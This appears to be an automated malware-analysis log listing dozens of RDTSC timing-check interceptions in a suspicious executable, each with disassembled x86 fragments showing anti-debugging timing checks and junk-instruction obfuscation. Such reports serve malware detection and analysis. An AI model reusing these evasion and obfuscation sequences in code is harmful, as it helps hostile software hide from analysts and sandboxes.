Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10CD655 second address: 10CD659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10CD4F8 second address: 10CD4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D15E9 second address: 10D15F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F0D84D62016h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D1CE2 second address: 10D1CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F0D8517B906h 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D1CEF second address: 10D1CF9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D84D62016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D1E8A second address: 10D1EAC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D8517B906h 0x00000008 jmp 00007F0D8517B913h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D37A7 second address: 10D37BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D6201Dh 0x00000007 pushad 0x00000008 jbe 00007F0D84D62016h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D6070 second address: 10D6076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D6397 second address: 10D639D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D639D second address: 10D63A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D63A1 second address: 10D63A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D63A5 second address: 10D63E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F0D8517B908h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jmp 00007F0D8517B910h 0x00000028 push 00000004h 0x0000002a push 0A3AD682h 0x0000002f push esi 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 pop edx 0x00000034 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D66B4 second address: 10D66B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 5720308 second address: 5720322 instructions: 0x00000000 rdtsc 0x00000002 call 00007F0D8517B90Ch 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 5720322 second address: 5720326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 5720326 second address: 5720340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B916h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF13B6 second address: FF13DB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D84D62016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0D84D62029h 0x00000011 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF13DB second address: FF13FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B918h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF0535 second address: FF055A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D8517B91Bh 0x00000008 jmp 00007F0D8517B915h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF3634 second address: FF364D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D84D62025h 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF9A33 second address: FF9A4C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D84D62021h 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FFD2BC second address: FFD2D7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0D8517B908h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007F0D8517B912h 0x00000013 jl 00007F0D8517B90Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1003003 second address: 1003025 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D8517B906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e mov edi, 27F6B101h 0x00000013 push 00000000h 0x00000015 stc 0x00000016 mov dword ptr [ebp+122D1871h], ebx 0x0000001c push eax 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 100668F second address: 10066FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D6201Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d movsx edi, bx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F0D84D62018h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c mov dword ptr [ebp+124629FFh], edx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F0D84D62018h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FFE036 second address: FFE0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F0D8517B908h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D21A7h], ecx 0x0000002a sub dword ptr [ebp+122D2216h], ecx 0x00000030 or edi, dword ptr [ebp+1244C5CFh] 0x00000036 push dword ptr fs:[00000000h] 0x0000003d mov dword ptr [ebp+122D1933h], edx 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a mov edi, edx 0x0000004c mov eax, dword ptr [ebp+122D10D9h] 0x00000052 mov edi, edx 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push eax 0x00000059 call 00007F0D8517B908h 0x0000005e pop eax 0x0000005f mov dword ptr [esp+04h], eax 0x00000063 add dword ptr [esp+04h], 00000017h 0x0000006b inc eax 0x0000006c push eax 0x0000006d ret 0x0000006e pop eax 0x0000006f ret 0x00000070 clc 0x00000071 mov edi, dword ptr [ebp+122D1BCFh] 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F0D8517B915h 0x0000007f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FFE0D5 second address: FFE0DF instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D84D6201Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1002207 second address: 1002218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F0D8517B906h 0x00000011 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10197AA second address: 10197BC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D84D62016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F0D84D62018h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 102251E second address: 1022528 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D84D6201Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022ABA second address: 1022AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F0D8517B90Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022AC7 second address: 1022AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D84D62027h 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c jo 00007F0D84D62016h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F0D84D62016h 0x0000001b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022C7E second address: 1022CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B917h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F0D8517B90Eh 0x0000000f jmp 00007F0D8517B90Dh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022E1C second address: 1022E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F0D84D62016h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022E33 second address: 1022E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F0D84D6201Eh 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022E47 second address: 1022E5F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0D8517B90Fh 0x00000008 pop esi 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10235B3 second address: 10235D3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D8517B918h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1027C26 second address: 1027C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0D84D62018h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1027EE8 second address: 1027EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D8517B90Bh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1027EF9 second address: 1027F21 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D84D62016h 0x00000008 jmp 00007F0D84D62029h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1027947 second address: 102795D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0D84D6201Ch 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1028602 second address: 102862B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B90Dh 0x00000007 jmp 00007F0D8517B911h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10312C4 second address: 10312D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d js 00007F0D8517B906h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10312D8 second address: 10312E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0D84D62016h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FB15C2 second address: FB15D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D84D62022h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7830 second address: FF7855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B919h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F0D8517B906h 0x00000011 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7859 second address: FF7879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0D8517B916h 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7879 second address: FD73A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F0D84D62018h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 add dword ptr [ebp+122D2157h], ebx 0x0000002a mov dword ptr [ebp+122D334Ah], esi 0x00000030 call dword ptr [ebp+122D2629h] 0x00000036 jbe 00007F0D84D6201Ah 0x0000003c push edi 0x0000003d pushad 0x0000003e popad 0x0000003f pop edi 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 jnl 00007F0D84D62016h 0x0000004b jmp 00007F0D84D62024h 0x00000050 popad 0x00000051 jmp 00007F0D84D6201Fh 0x00000056 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7E53 second address: FF7EAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0D84D62016h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 39F6BAA1h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F0D84D62018h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f jmp 00007F0D84D62021h 0x00000034 mov dword ptr [ebp+12458DB4h], esi 0x0000003a push C1549D7Dh 0x0000003f push eax 0x00000040 push edx 0x00000041 push ebx 0x00000042 pushad 0x00000043 popad 0x00000044 pop ebx 0x00000045 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF7F2F second address: FF7F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0D8517B910h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F0D8517B908h 0x00000014 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF8237 second address: FF8241 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0D8517B906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF837A second address: FF83BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007F0D8517B90Dh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0D8517B908h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000004h 0x00000029 mov dword ptr [ebp+122D2157h], ebx 0x0000002f nop 0x00000030 pushad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF89DD second address: FF89E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0D8517B906h 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF89E7 second address: FF8A24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ebx 0x00000016 jmp 00007F0D84D62023h 0x0000001b pop ebx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0D84D6201Fh 0x00000025 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF8AC7 second address: FF8B11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B918h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 nop 0x00000011 xor edi, 5741E799h 0x00000017 lea eax, dword ptr [ebp+12489605h] 0x0000001d pushad 0x0000001e mov ecx, dword ptr [ebp+122D3A9Bh] 0x00000024 mov ebx, eax 0x00000026 popad 0x00000027 mov edi, dword ptr [ebp+122D1C27h] 0x0000002d nop 0x0000002e push ecx 0x0000002f js 00007F0D8517B90Ch 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10304E3 second address: 103050A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0D8517B906h 0x00000009 ja 00007F0D8517B906h 0x0000000f pushad 0x00000010 popad 0x00000011 jl 00007F0D8517B906h 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007F0D8517B90Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1030CD9 second address: 1030CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0D8517B90Dh 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1039964 second address: 1039980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D6201Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a ja 00007F0D84D62016h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 103832E second address: 1038350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jbe 00007F0D84D62016h 0x00000010 pop esi 0x00000011 jnc 00007F0D84D62021h 0x00000017 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10387B7 second address: 10387C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0D8517B906h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10387C8 second address: 10387DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D8517B90Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038C81 second address: 1038C90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 je 00007F0D8517B906h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038C90 second address: 1038C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F0D84D62016h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038F68 second address: 1038F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B916h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1038F92 second address: 1038FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0D84D6201Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10397D9 second address: 10397EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0D84D62016h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F0D84D62016h 0x00000015 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 103FF9A second address: 103FFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007F0D84D6202Ah 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1042B99 second address: 1042BC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0D84D6202Ch 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 104CA6A second address: 104CACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jmp 00007F0D84D62021h 0x0000000b jng 00007F0D84D62016h 0x00000011 pop eax 0x00000012 je 00007F0D84D62022h 0x00000018 popad 0x00000019 pushad 0x0000001a jno 00007F0D84D62018h 0x00000020 pushad 0x00000021 jmp 00007F0D84D62022h 0x00000026 jmp 00007F0D84D6201Ch 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e jl 00007F0D84D62016h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 104D2DF second address: 104D30C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D8517B916h 0x0000000d jmp 00007F0D8517B90Fh 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10506DE second address: 1050714 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D8517B908h 0x00000008 jmp 00007F0D8517B90Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F0D8517B916h 0x00000019 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1050131 second address: 105014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D84D62016h 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F0D84D62016h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007F0D84D62016h 0x0000001b rdtsc
